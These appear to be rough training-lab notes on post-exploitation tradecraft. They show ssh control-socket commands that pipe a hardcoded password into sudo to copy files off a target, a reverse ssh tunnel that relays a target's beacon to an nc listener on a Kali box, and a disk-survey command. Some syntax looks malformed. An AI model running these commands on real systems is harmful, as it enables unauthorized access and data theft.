multiple line command, one pass prompt and the folling prompt you use EOF
           rodgers file collect linux to linux (need sudo to view file) after command is run, 
ssh -S /tmp/T# \| sudo --prompt="" -S -- cat <file> > <dir coppied to or name of file if already in dir> << EOF 
1st prompt :: gator boy with cursor is asking for password
2nd prompt :: EOF


ssh -S /tmp/T# \| sudo --prompt="" -S -- cat <file> > <where you want file /name> << EOF
> password11
> EOF


============================================================================================
============================================================================================
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
____________________________________________________________________________________________


remote tunneling explained by notorious gangster andrew rodgers

EXAMPLE
T4 target
kalibox is obviously kali
you see a beacon on a target machine, lets say T4 beaconing on port 12345

kaliops# ssh -S /tmp/T4 -R <ipofT4>:12345:127.0.0.1:RHP1

nc -nlvp RHP1

======================================================================================
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
______________________________________________________________________________________


LT HEASER COLLACT COMMAND

ssh -S /tmp/T# D "echo 'password11' | sudo -S fdisk -l" >> Survey_<ip>

































if you use wevutil in windows box you are in the application logs








